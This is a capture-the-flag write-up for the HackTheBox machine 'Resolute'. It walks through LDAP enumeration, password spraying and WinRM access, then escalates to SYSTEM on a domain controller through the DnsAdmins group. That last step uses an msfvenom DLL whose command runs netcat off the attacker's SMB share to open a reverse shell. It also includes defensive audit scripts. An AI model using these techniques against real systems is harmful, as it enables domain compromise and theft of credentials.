
Resolute Writeup (HackTheBox)


Enumeration #

As usual, we begin with an nmap scan.

msaxena@Mayur-Laptop:~$ sudo nmap -Pn -sS -p1-10000 -T4 -sV 10.10.10.169
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-30 02:07:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing

With this box looking like a domain controller, I started by trying to access LDAP anonymously. First, although nmap had already reported a domain name (megabank.local), I ran my own query to confirm it.

msaxena@Mayur-Laptop:~$ ldapsearch -x -h 10.10.10.169 -s base namingContexts
...
dn:
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local
...

With megabank.local confirmed, I tried an anonymous bind. This worked, returning about 6,800 lines of data. The snippet of most interest to me was the following:

msaxena@Mayur-Laptop:~$ ldapsearch -x -h 10.10.10.169 -D '' -w '' -b "DC=megabank,DC=LOCAL" | tee ldap.txt
...
# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Marko Novak
sn: Novak
description: Account created. Password set to W********!
givenName: Marko
distinguishedName: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,D
C=local
instanceType: 4
whenCreated: 20190927131714.0Z
whenChanged: 20191203132427.0Z
displayName: Marko Novak
uSNCreated: 13110
uSNChanged: 69792
name: Marko Novak
objectGUID:: 8oIRSXQNmEW4iTLjzuwCpw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132140638345690606
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWVwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: marko
sAMAccountType: 805306368
userPrincipalName: marko@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927131714.0Z
dSCorePropagationData: 16010101000001.0Z
...

User #

Within the description of the account there was a default password! Unfortunately, the credentials marko / W********! did not work when authenticating against SMB.

msaxena@Mayur-Laptop:~$ smbmap -u marko -p 'W********!' -d megabank -H 10.10.10.169
[!] Authentication error on 10.10.10.169

This LDAP dump contained plenty of other domain users, so I tried the same password against every known user in the domain using msfconsole.

msaxena@Mayur-Laptop:~$ grep samAccountName ldap.txt -i | cut -d ' ' -f2
...
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
msaxena@Mayur-Laptop:~$ cat users.txt
**SAME USERS AS ABOVE**
msaxena@Mayur-Laptop:~$ msfconsole
...
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.169
RHOSTS => 10.10.10.169
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain megabank
SMBDomain => megabank
msf5 auxiliary(scanner/smb/smb_login) > set SMBPass 'W********!'
SMBPass => W********!
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE users.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\ryan:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\marko:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\sunita:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\abigail:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\marcus:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\sally:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\fred:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\angela:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\felicia:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\gustavo:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\ulf:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\stevie:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\claire:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\paulo:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\steve:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\annette:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\annika:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\per:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\claude:W********!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: 'megabank\melanie:W********!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\zach:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\simon:W********!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'megabank\naoki:W********!',
[*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete)

So the login for melanie worked! Confirming this result for ourselves with smbmap, we see that it is true.

msaxena@Mayur-Laptop:~$ smbmap -H 10.10.10.169 -u 'melanie' -d 'megabank' -p 'W********!'
[+] IP: 10.10.10.169:445 Name: 10.10.10.169
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share

Let's see what else we know about her from LDAP.

# Melanie Purkis, Users, megabank.local
dn: CN=Melanie Purkis,CN=Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Melanie Purkis
distinguishedName: CN=Melanie Purkis,CN=Users,DC=megabank,DC=local
instanceType: 4
whenCreated: 20191204103845.0Z
whenChanged: 20200530091504.0Z
uSNCreated: 131130
memberOf: CN=Remote Management Users,CN=Builtin,DC=megabank,DC=local
uSNChanged: 148093
name: Melanie Purkis
objectGUID:: XYoyZXBbZk6QBuoYRsNkAg==
userAccountControl: 512
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
logonHours:: ////////////////////////////
pwdLastSet: 132353037047984863
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWdScAAA==
accountExpires: 0
logonCount: 0
sAMAccountName: melanie
sAMAccountType: 805306368
userPrincipalName: melanie@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132353034212198387

We can see that she is a member of the Remote Management Users group. Looking back at our port scan, WinRM is indeed enabled on port 5985, so we can try logging in.

msaxena@Mayur-Laptop:~$ pwsh
...
PS /home/msaxena> Enter-PSSession 10.10.10.169 -Credential megabank\melanie -Authentication Negotiate

PowerShell credential request
Enter your credentials.
Password for user megabank\melanie: ***********

[10.10.10.169]: PS C:\Users\melanie\Documents> dir
[10.10.10.169]: PS C:\Users\melanie\Documents> dir ..\Desktop


Directory: C:\Users\melanie\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:33 AM 32 user.txt


[10.10.10.169]: PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
0c3be4........978540

Second User #

This was actually painfully slow, so after grabbing the flag I switched to evil-winrm to start the recon for the path towards admin.

msaxena@Mayur-Laptop:~$ evil-winrm -i 10.10.10.169 -u 'megabank\melanie' -p 'W********!'

I started by listing the processes, just to get an idea of what I was walking into.

*Evil-WinRM* PS C:\Users\melanie\Documents> Get-Process

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
40 3 1524 2292 1676 1 cmd
110 9 5336 11168 1652 1 conhost
289 13 1864 4248 364 0 csrss
150 13 1388 6884 444 1 csrss
353 32 13412 22052 1168 0 dfsrs
130 8 1692 5360 1104 0 dfssvc
214 13 3652 12604 2396 0 dllhost
5311 3694 68996 68000 3820 0 dns
0 0 0 4 0 0 Idle
123 12 1984 5356 1424 0 ismserv
2912 182 48256 62772 568 0 lsass
473 39 55292 72108 1060 0 Microsoft.ActiveDirectory.WebServices
132 9 2108 7920 2024 0 MpCmdRun
190 12 2472 9440 2492 0 msdtc
492 59 130400 122576 1672 0 MsMpEng
276 10 4184 9336 552 0 services
51 2 368 1212 268 0 smss
1092 41 17580 36124 72 0 svchost
396 34 7052 13644 360 0 svchost
376 14 3020 9760 740 0 svchost
433 18 3080 8512 800 0 svchost
378 15 9496 14316 908 0 svchost
706 24 5884 14060 916 0 svchost
625 42 12776 26200 964 0 svchost
136 11 1380 6596 1096 0 svchost
201 12 2044 7972 1764 0 svchost
261 16 5784 14660 2016 0 svchost
100 7 1748 7280 3080 0 svchost
276 19 8620 14592 3692 0 svchost
796 0 128 144 4 0 System
164 11 1768 9112 2332 1 taskhostw
196 16 2372 10672 2248 0 vds
146 11 3040 9980 1392 0 VGAuthService
317 21 9508 22036 1332 0 vmtoolsd
170 15 3344 12780 2764 1 vmtoolsd
92 8 944 4912 432 0 wininit
186 9 1964 8976 508 1 winlogon
286 14 7376 15816 2532 0 WmiPrvSE
691 26 56872 74480 0.92 668 0 wsmprovhost
852 31 60564 84000 1004 0 wsmprovhost
584 26 58920 76508 2.22 1444 0 wsmprovhost
232 17 28768 26160 0.08 3372 0 wsmprovhost
617 30 196584 220720 60.22 3576 0 wsmprovhost
740 26 58860 78628 3816 0 wsmprovhost

Not much to note here, but MsMpEng is running, meaning Windows Defender is active on the box - good to know.

Then, I began working my way up the directories and listing the contents, making sure that I was viewing hidden files and folders as well using -Force.

*Evil-WinRM* PS C:\Users\melanie\Documents> cd C:\Users
*Evil-WinRM* PS C:\Users> Get-ChildItem -Force


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d--hsl 7/16/2016 6:28 AM All Users
d-rh-- 9/25/2019 10:17 AM Default
d--hsl 7/16/2016 6:28 AM Default User
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
-a-hs- 7/16/2016 6:16 AM 174 desktop.ini

*Evil-WinRM* PS C:\> cd C:\Users\ryan
*Evil-WinRM* PS C:\Users\ryan> dir
Access to the path 'C:\Users\ryan' is denied.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : PermissionDenied: (C:\Users\ryan:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

As it turns out, there was a second user (ryan) on the box. Although I didn't expect it to work, I still tried to view the contents of his user directory (with no luck).

*Evil-WinRM* PS C:\> cd C:\\
*Evil-WinRM* PS C:\> Get-ChildItem -Force


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 5/30/2020 12:38 AM 402653184 pagefile.sys

The PSTranscripts directory isn't normally there, so let's see what's inside.

*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> Get-ChildItem -Force


Directory: C:\PSTranscripts


Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203


*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> Get-ChildItem -Force


Directory: C:\PSTranscripts\20191203


Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"

>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan S********!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"

>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
...

This file contains a history of executed commands, and in it is what looks like a password for the ryan account, typed inline in a net use command.
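A transcript like this one is exactly the kind of file a defender should be sweeping for leaked credentials. The following is an added example, not part of the original writeup: it parses the transcript layout shown above (header fields, the `Command start time` blocks, and the bound `Command` value) and flags any `net use` that carries a password inline. SAMPLE_TRANSCRIPT is a constructed excerpt modelled on the file, and the function names are my own.

```python
import re

# Constructed excerpt in the layout of a PowerShell transcript file (not the transcript from the box).
SAMPLE_TRANSCRIPT = r"""
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join('PS ',$(whoami),'> ')
if (!$?) { exit 1 }"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan S********!

if (!$?) { exit 1 }"
**********************
"""

SEPARATOR = r"\*{10,}"
# One block per "Command start time" header, up to the next row of asterisks.
BLOCK = re.compile(r"Command start time: (\d+)\n" + SEPARATOR + r"\n(.*?)(?=\n" + SEPARATOR + r"|\Z)", re.S)
COMMAND = re.compile(r'name="Command"; value="(.*?)"(?:\n|$)', re.S)
NET_USE = re.compile(r"\bnet\s+use\s+(\S+)\s+(\\\\\S+)(.*)", re.I)

def parse_transcript(text):
    """Return the header fields and the (start time, command text) pairs the transcript recorded."""
    header = dict(re.findall(r"^(Username|RunAs User|Machine|Start time): (.+)$", text, re.M))
    commands = []
    for when, body in BLOCK.findall(text):
        m = COMMAND.search(body)   # blocks with no bound Command (e.g. Out-String) are skipped
        if m:
            commands.append((when, m.group(1).strip()))
    return header, commands

def find_credentials(commands):
    """Flag 'net use' calls that supply a password inline, positionally or via /user:, and report the share."""
    findings = []
    for when, cmd in commands:
        m = NET_USE.search(cmd)
        if not m:
            continue
        tail = m.group(3).split()
        # After "net use <drive> <share>", a bare token is a positional password; /user: means one was typed too.
        if any(not t.startswith("/") and t != "*" for t in tail) or any(t.lower().startswith("/user:") for t in tail):
            findings.append((when, m.group(2)))
    return findings
```

The finding deliberately reports the timestamp and share rather than the secret itself, so the output can go into a ticket without re-leaking the password.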

Here's what we know about Ryan from LDAP:

# Ryan Bertrand, Contractors, MegaBank Users, megabank.local
dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Bertrand
sn: Bertrand
givenName: Ryan
distinguishedName: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megaba
 nk,DC=local
instanceType: 4
whenCreated: 20190927105650.0Z
whenChanged: 20200530091504.0Z
displayName: Ryan Bertrand
uSNCreated: 13048
memberOf: CN=Contractors,OU=Groups,DC=megabank,DC=local
uSNChanged: 148091
name: Ryan Bertrand
objectGUID:: 44OMhL5sPk26z6p7032mkQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
logonHours:: ////////////////////////////
pwdLastSet: 132353037041110259
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWUQQAAA==
accountExpires: 0
logonCount: 0
sAMAccountName: ryan
sAMAccountType: 805306368
userPrincipalName: ryan@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927105650.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132352980496311688
msDS-SupportedEncryptionTypes: 0

He's a member of the Contractors group, and what do we know about that group?

# Contractors, Groups, megabank.local
dn: CN=Contractors,OU=Groups,DC=megabank,DC=local
objectClass: top
objectClass: group
cn: Contractors
description: Contractors
member: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
distinguishedName: CN=Contractors,OU=Groups,DC=megabank,DC=local
instanceType: 4
whenCreated: 20190926123745.0Z
whenChanged: 20190927140221.0Z
displayName: Contractors
uSNCreated: 12887
memberOf: CN=DnsAdmins,CN=Users,DC=megabank,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=megabank,DC=local
uSNChanged: 16397
name: Contractors
objectGUID:: vvcvnwX4H0mv8TZTZTh01w==
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWTwQAAA==
sAMAccountName: Contractors
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927105218.0Z
dSCorePropagationData: 16010101000417.0Z

That group is itself a member of the Remote Management Users group (meaning ryan can use WinRM too), and also of another group called DnsAdmins. Knowing that we can log in over WinRM, let's take a quick peek at his user directory.
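Both of the LDAP findings in this writeup, the password left in marko's description and ryan reaching DnsAdmins only through the nested Contractors group, are things an AD owner can pull out of an ldapsearch dump automatically. The following audit script is an added example, not part of the original writeup: it parses LDIF as ldapsearch emits it (including values folded across lines, as in the distinguishedName entries above), flags descriptions that mention a password, and resolves memberOf links transitively. SAMPLE_LDIF is a constructed excerpt and the function names are my own.

```python
import base64
import re

# Constructed LDIF excerpt in the shape of an ldapsearch dump (not the box's own output): a password in a
# description, a user in a nested group, and one value folded across two lines.
SAMPLE_LDIF = """\
# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to W********!
distinguishedName: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,D
 C=local
sAMAccountName: marko

dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
memberOf: CN=Contractors,OU=Groups,DC=megabank,DC=local
sAMAccountName: ryan

dn: CN=Contractors,OU=Groups,DC=megabank,DC=local
memberOf: CN=DnsAdmins,CN=Users,DC=megabank,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=megabank,DC=local
"""

ATTR = re.compile(r"([^:]+)(::?)\s*(.*)")   # "name: value" or "name:: base64value"

def parse_ldif(text):
    """Return {dn: {attribute: [values]}}, unfolding continuation lines and decoding '::' base64 values."""
    entries, attrs, lines = {}, {}, []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:   # LDIF folds long values onto lines that begin with a space
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    for line in lines + [""]:               # the trailing "" flushes the last entry
        if not line or line.startswith("#"):
            if "dn" in attrs:
                entries[attrs["dn"][0]] = attrs
            attrs = {}
            continue
        m = ATTR.match(line)
        if not m:                           # e.g. the "..." lines left in a trimmed dump
            continue
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        attrs.setdefault(name.strip(), []).append(value.strip())
    return entries

def descriptions_with_passwords(entries):
    """Audit finding: (sAMAccountName, description) for every object whose description mentions a password."""
    return [(a.get("sAMAccountName", ["?"])[0], d)
            for a in entries.values() for d in a.get("description", [])
            if re.search(r"\b(pass(word|wd)?|pwd)\b", d, re.I)]

def effective_groups(entries, sam_account_name):
    """Follow memberOf links transitively so that ryan -> Contractors -> DnsAdmins becomes visible."""
    by_sam = {a["sAMAccountName"][0].lower(): dn for dn, a in entries.items() if "sAMAccountName" in a}
    seen, todo = set(), [by_sam[sam_account_name.lower()]]
    while todo:
        for group in entries.get(todo.pop(), {}).get("memberOf", []):
            if group not in seen:
                seen.add(group)
                todo.append(group)
    return sorted(dn.split(",")[0][len("CN="):] for dn in seen)   # "CN=DnsAdmins,..." -> "DnsAdmins"
```

Run it over the full `ldap.txt` from the anonymous bind and every description hit and every account that transitively lands in DnsAdmins or Remote Management Users comes out in one pass.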

msaxena@Mayur-Laptop:~$ evil-winrm -i 10.10.10.169 -u 'megabank\ryan' -p 'S********!'
...
*Evil-WinRM* PS C:\Users\ryan\Documents> dir
*Evil-WinRM* PS C:\Users\ryan\Documents> dir ..\Desktop


Directory: C:\Users\ryan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt


*Evil-WinRM* PS C:\Users\ryan\Documents> type ..\Desktop\note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

Privilege Escalation #

OK, so where to go from here? Since this was an Active Directory themed box, I figured I was supposed to do something with the group memberships... and I was also just curious what the DnsAdmins group was for. After some searching, I found a couple of articles about privilege escalation from this group.

In a nutshell, since we're a member of DnsAdmins, we can manage DNS server objects (in this case, the DNS server on this domain controller). We'll tell the DNS Server service to load a DLL of our choosing, and because that service runs as SYSTEM, we get SYSTEM-level code execution.

Step 1. Determine Architecture #

First we need to determine whether our target is running a 32-bit or 64-bit OS. We can do this with the following PowerShell command:

*Evil-WinRM* PS C:\Users\ryan\Documents> [System.Environment]::Is64BitOperatingSystem
True

Step 2. Build Payload #

Now, we can use msfvenom to build a 64-bit Windows DLL that runs an arbitrary Windows command. Our command will be to run nc.exe off an SMB share that we control and create a reverse shell that connects back to us.

msaxena@Mayur-Laptop:~$ msfvenom -p windows/x64/exec -f dll CMD='\\10.10.14.15\MYSHARE\nc.exe 10.10.14.15 4443 -e cmd.exe' > parsnips.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 5120 bytes

Step 3. Host an SMB share #

We're going to use this SMB share to serve both the DLL we just created and the nc.exe binary. To do so, we'll use smbserver.py from Impacket.

msaxena@Mayur-Laptop:~$ sudo python3 ~/impacket/examples/smbserver.py -debug MYSHARE .

Step 4. Listen for the reverse shell #

Of course, don't forget to spin up a nc listener for the reverse shell we're expecting.

msaxena@Mayur-Laptop:~$ nc -nlvp 4443
listening on [any] 4443 ...

Step 5. Configure and restart DNS service #

On the Windows machine now, using our WinRM session as ryan, we can configure the service to load our DLL.

*Evil-WinRM* PS C:\> dnscmd resolute /config /serverlevelplugindll \\10.10.14.15\MYSHARE\parsnips.dll

We can check if this command worked like so:

*Evil-WinRM* PS C:\> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll


ServerLevelPluginDll : \\10.10.14.15\MYSHARE\parnsips.dll
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName : Parameters
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry

Once everything is in place, we just restart the DNS service.

*Evil-WinRM* PS C:\> sc.exe \\resolute stop dns
*Evil-WinRM* PS C:\> sc.exe \\resolute start dns

Step 6. Pwnage #

Back on our Kali box, we should have caught our reverse shell. Keeping in mind slight delays due to SMB, if you haven't caught one, check the Impacket debug output for any clues. It could also be the case that Windows Defender flagged some aspect of the payload or callback, so maybe try simplifying the command to be executed (for example, creating a new domain administrator).

...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.169] 50436
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d948........5e619c

With the root flag in hand, we're done! Our binaries were all hosted on our own SMB share, and based on the note we found on ryan's Desktop, the change we made to the DNS server service will be reverted automatically, so there's no cleanup to do.
